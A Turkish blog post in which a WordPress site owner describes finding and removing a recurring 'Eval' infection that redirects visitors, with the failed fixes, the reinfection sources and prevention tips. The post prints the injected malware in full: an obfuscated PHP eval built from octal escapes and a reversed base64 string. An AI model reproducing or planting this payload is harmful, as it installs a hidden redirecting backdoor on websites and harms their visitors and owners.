Bu yazı en sonra 6 Eylül 2017 tarihinde güncellenmiştir. 

Geçtiğimiz neredeyse 2 aylık dönemde Suskumru’ya dadanan ve bir türlü kurtulamadığım Eval virüsü ile uğraştım. Virüsü kalıcı olarak çözebilmek adına çok uğraştım ama 1,5 ay boyunca denediğim sayısız yöntem işe yaramadı. Hatta ücretli destek bile aldım ama yine çözüme kavuşturamadık. Tüm bunlardan sonra tamamen kendi deneyimlerimle virüsü kalıcı olarak silmeyi başardım. İşte bu yazıda WordPress Eval Virüsü’nden nasıl kurtulduğumu anlatıp bu sorunu yaşayanlara da yol göstermek istedim.

Eval nasıl bir virüs?

WordPress ağırlıklı olmak üzere tüm web sitelerine bulaşabilen bu virüs bayağı ilginç bir algoritmaya sahip. Eğer bilgisayarınızdan sık sık sitenize giriyorsanız sizde hiçbir sorun yok gibi görünüyor ama bir başkası arama motorlarından ya da sosyal medya linklerinden sitenize girdiğinde direkt olarak başka sitelere yönlendiriyor. Yani ziyaretçi sitenize hiç girmeden başka sitelere yönlenmiş oluyor. Bu da ciddi anlamda ziyaretçi kaybı demek. Benim neredeyse yarı yarıya düştü ziyaretçi sayım bu zaman zarfında.

Tarayıcınızın adres satırına direkt olarak site adresini yazıp girdiğinizde de çoğu zaman normal bir şekilde sitenize girebiliyorsunuz fakat bazen bu şekilde yaptığınızda bile farklı sitelere yönlendirme yapabiliyor.

Ben bu virüsün Suskumru’da olduğundan bazı arkadaşlarımın uyarısı ile haberdar oldum. Buna istinaden de farklı tarayıcılarda, telefonumda ve başka bilgisayar ve telefonlarda denedim. Evet, bloguma giremiyordum.

WordPress Eval Virüsü nasıl bulaşır?

Aslında bu virüsün nasıl bulaşabileceğine dair sayısız yöntem var. Bunların en başlıcalarını şu şekilde sıralayabiliriz:

  • Eklentilerinizde açık olabilir.
  • Şifreleriniz çok basit olabilir.
  • Warez tema, script ya da eklenti kullanımından kaynaklanıyor olabilir. Warez olan tema, script ya da eklentiniz pasif durumda olsa bile kendini enjekte edebiliyor.

Eval’den kurtulmak için neler denedim?

Bu anlatacaklarımın tümü WordPress altyapılı sistemler içindir. İllalah ettiren Eval’den kurtulmak adına aşağıdaki yöntemleri izledim. Yalnız bu yöntemler sorunuma çözüm olmadı. Siz yine de deneyin, belki sizde işe yarayabilir.

  • İlk etapta virüsle ilgili bir arama yaptım arama motorlarında. Bulduğum bilgilere göre bu virüsün bulaşması en muhtemel dosyalar şunlar:
    • index.php
    • wp-settings.php
    • wp-config.php
    • wp-load.php
    • .htaccess
  • Yaptığım incelemede virüsün index.php, wp-settings.php ve wp-config.php dosyalarına bulaştığını tespit ettim. Bu kodları orijinal dosyaları temel alarak sildim. Yalnız dikkat edin, bu işlemi yapmadan önce en azından söz konusu dosyalarınızın yedeğini alın. Merak edenler için virüs şöyle bir şeydi:
    <?php
    eval("\145\166\141\154\050\142\141\163\145\066\064 \137\144\145\143\157\144\145\050\163\164\162\162\1 45\166\050'==QfgsDdphXZgsTKog2c1xmZgszJ+QHcpJ3Yz9C P+Iycq5SMucjLx0SeyVWdxp2Lt92YusmcvdXZtFmcm1SeyVWdx p2LvoDc0RHai0zYyNHI0BXayN2c8cCIvh2YlByegkSKddCVOV0 RB9lUFNVVfBFVUh0JbJVRWJVRT9FJABCLnk2cvUGbn92bnxHel RmbhlHfyVWehxGctwVYpRWZt1CXzd3bk5Wa3xHZh9Gbud3bkxH duFmdhxXYjlmcl1WY8h2cvRnbpNWYt9yJog2Y0FWbfdWZyBXIg YiJgkSKddiUFJVRGVkUfBFVUh0JbJVRWJVRT9FJABCLnk2cv0T c/wVb8h2YyFWZz12LngCajRXYt91ZlJHcgwHfgkSXnQlTFdUQfJV RTV1XQRFVIdyWSVkVSV0UfRCQgwyJpN3LlRne812bvhHfhRGe8 N3clxWZyl2d8N3biV2d8BXY3xXZu9mZhR2b2x3aulGbuwFc1xn clN3dvJnYuwFc1x3c1xWZ0xXZslmYv1WL0xnbhlmYtl3c8lnbv NHfl52boBHdyFWbzxXLll2c8Bnchh2c81WZnF2c8VmbvhGc8NH cpxWaoBHfjlmbvNXYuFGc81GbhBHfhl2av5GftMWZuxXYs9mcv R3btxXai9Wb8BXbtxHcklWb8lmbp1mLhJXZw9GfhZXYqxXZtJj a8R2bwlGfxFGcpxHZhBXa8VmbvhGcpxXZslmYv1WZpx3Y0hGfl 5WahxWZ89WbvN2bkxHdlt2YpJ3Y8xGblNGfx5WZixXeyJXZit2 YhxmY892Z05WY2FGfkl2byRmbhxXav1WY8xWZ0F2YsF2LngCaj RXYt91ZlJHcgwHfgkSXnQFUFN0QB9FUURFSnslUFZlUFN1XkAE IscSaz9Cbth3KcxWb0hGeuAXY35CZuZ3Lc52bpRXYjlGbwBXY8 xWb35CchdnLk5mdvwFd4VGdvcCKoNGdh12XnVmcwhCKgYWa'\0 51\051\051\073");
    ?>
  • İlk 12 saat sorun yoktu ama sonrasında virüs kendini tekrar enjekte etti. Bunun üzerine biraz daha araştırma yaptım ve yine virüs içeren kodları sildim. Hemen devamında ftp, reseller, Cpanel ve WordPress kullanıcı adları ile şifrelerimi değiştirdim.
  • Normal isimlerden farklı isimlerde dosyalar var mı diye kontrol ettim ama yoktu. Mesela örnek olarak bir harf değiştirilip ya da eklenerek şu şekilde olabiliyor aldatıcı dosyalar:
    • luad.php
    • wp-settings1.php
    • functionsi.php
  • Bilgisayarımda çeşitli antivirüs ve malware yazılımları ile tarama yaptım. Bir virüs bulamadım. Ayrıca public_html’i masaüstüne indirip onda da virüs taraması yaptım ama yine bir virüse rastlamadım.
  • FTP programım olan Filezilla’yı kaldırıp yeniden kurdum. Şifreleri asla kaydetme şeklinde ayarladım.
  • Ben bu işi yapamayacağım, virüsten tek başıma kurtulamayacağım diyerek ücretli yardım almaya karar verdim. Arkadaş çok ilgilendi sağolsun, hakkını ödeyemem ama sorunu yine çözemedik. Public_html üzerinde dosya izinlerini değiştirmeyi denedik fakat çözüm olmadı.
  • En son yedek alıp, veritabanı vs. sıfırdan kurulum yaptık. Tam her şey halloldu derken virüs yine 12 saat içerisinde kendini tekrarladı.

İşte tüm bunlar sorunu kalıcı olarak çözmemi sağlamadı. Ne yaptıysam olmadı, virüs küfür eder gibi kendini tekrar tekrar enjekte etti.

Peki, WordPress Eval Virüsü’nden nasıl kurtuldum?

Artık sona yaklaştığımı, Suskumru’ya veda etmek zorunda kalabileceğimi düşünürken şans eseri bir decode (şifreli kodları çözen) sitesine denk geldim. İlgili kod betiklerini siteye deneme yanılma yöntemiyle yazıp virüsün nereden kendini tekrar enjekte ettiğini buldum. Bendeki virüs kendini şuradan enjekte ediyormuş: /suskumru/public_html/wp-content/uploads/profiles/user.php  ayrıca bir keresinde de .ico uzantılı bir dosyadan bulaştı. Sizde farklı bir yerden ediyor olabilir. Onun için deneyerek görmenizde fayda var.

Site adresi şu şekilde: http://ddecode.com/hexdecoder/

Bu arada kesinlikle reklam falan değil, bizzat başımdan geçen olay neticesinde şahsi tecrübelerimi anlattım.

Virüsün nerede olduğunu tespit ettikten sonra ilk olarak yedek aldım. Söz konusu .ico uzantılı dosyayı sildim. Ardından virüsü tespit ettiğim dosyadaki kodları tekrar WordPress resmi sitesinden indirdiğim orijinal kodlarla değiştirdim ve en son olarak da ftp, Cpanel, reseller ve WordPress kullanıcı adlarımla şifrelerimi değiştirdim.

Şu sıralar (15 gündür falan) virüse dair bir uyarı almadım. Hiç de rastlamadım. İnşallah da rastlamam. Eğer virüs yine geldi diye bir yazı yazarsam bilin ki burada yazdığım ve yaptığım şeyler işe yaramamış demektir 🙂

Virüsle yeniden başım dertte: 6 Eylül 2017 güncellemesi

Eval’den kurtuldum sanarken bir anda yeniden ortaya çıktı. Peki ben pes ettim mi? Hayır 🙂 Öncelikle Cpanel üzerinden sitemin dosyalarının arasına daldım. Orada “include” kelimesini aradım ve bingo! 2 farklı yerde benim bilgim dışında oluşturulmuş include.php dosyaları var. Önce o dosyaları masaüstüne yedekledim ki yanlış bir şey yaparsam eski dosyayı tekrar yükleyip hatamı telafi edeyim. Sonra o dosyaları kalıcı olarak sildim ve virüs namına bir şey kalmadı. Merak edenler için benim virüslü include.php dosyalarım şu şekildeydi:

Baktım kırmızı ile işaretlediklerim dışındakiler zaten olması gereken dosyalar. Onların temiz olduğuna emin oldum ama gel gelelim uploads klasörünün içinde include dosyasının ne işi var! İşte bundan emin oldum. Kesinlikle virüslü dosyalardan biri buydu. Sonra Syntax Highliter isimli eklentinin dosyaları arasında da bir tane buldum ve sildim. Şimdi virüse elveda 🙂

Bu arada bir kez daha üstüne basa basa söylüyorum:  İşlem yapmadan önce mutlaka yedek alın! 

Google Analyctis Virüsü nedir? Nasıl kurtulurum?

Öncelikle üstteki başlığı yanlış yazmadım. Yani “Google Analytics olacaktı o” demeyin. Google’ın sayaç servisi olan Analytics’i taklit ederek kendini ilgili satırlara yerleştiren bir virüs benzeri zımbırtı da budur. Bunu tespit etmek için siteniz açıkken Ctrl + U kombinasyonu ile sitenizin kaynak kodlarını açın ve şunu arayın: “Analyctis” Muhtemelen şu aşağıdaki gibi bir kod betiği bulacaksınız:

Sonra virüsün sitenizde hangi kısımda olduğuna bakın. Genelde header.php ya da footer.php’de olur. Kodları bulduktan sonra bu satırı komple silin ama silmeden önce yedek almayı unutmayın.

Sitenize virüs bulaşmasını önlemek için uyarılar

Ben yandım, siz yanmayın diye düşünerek kendimce birkaç öneride bulunmak istiyorum. Bu önerileri dikkate alırsanız virüs bulaşma riskini de azaltmış olursunuz.

  • Öncelikle asla ve asla warez tema, eklenti ya da script kullanmayın. Pasif dahi olsa virüse backdoor (yani arka kapı, bir nevi açık kapı) bırakmış olursunuz.
  • Şifreleriniz ve kullanıcı adlarınız mümkün olduğunca karmaşık olsun. Her sitenizde aynı kullanıcı adı ya da şifreyi kullanmayın.
  • Sitenizin en kötü ihtimalle haftalık yedeğini almayı unutmayın.
  • Ne olduğunu bilmediğiniz program indirme sitelerine bulaşmayın.
  • Şifrelerinizi ftp programına ya da tarayıcıya kaydetmeyin. Manuel olarak girin her seferinde.
  • Gerçekten güvenilir ve kurumsal olan firmalardan hosting hizmeti alın.
  • Bilginiz varsa WordPress güvenlik eklentilerinden birini kurun.
  • Sitenizde virüs tespit ettiyseniz önce sakin olun. Ardından virüsün kaynağını tespit etmeye çalışın. Ardından da nasıl çözebileceğinize dair araştırma yapın.

Son olarak; arkadaşlar ben bu virüs belası nedeniyle psikolojimi bozdum. Umarım bu yazı birilerine faydalı olur. Ben sorunumu bu şekilde çözdüm. Sizin de bu yöntemlerle çözebileceğinize inanıyorum. Olur da çözemezseniz bana yazın, vaktim müsait oldukça yardımcı olmaya çalışırım.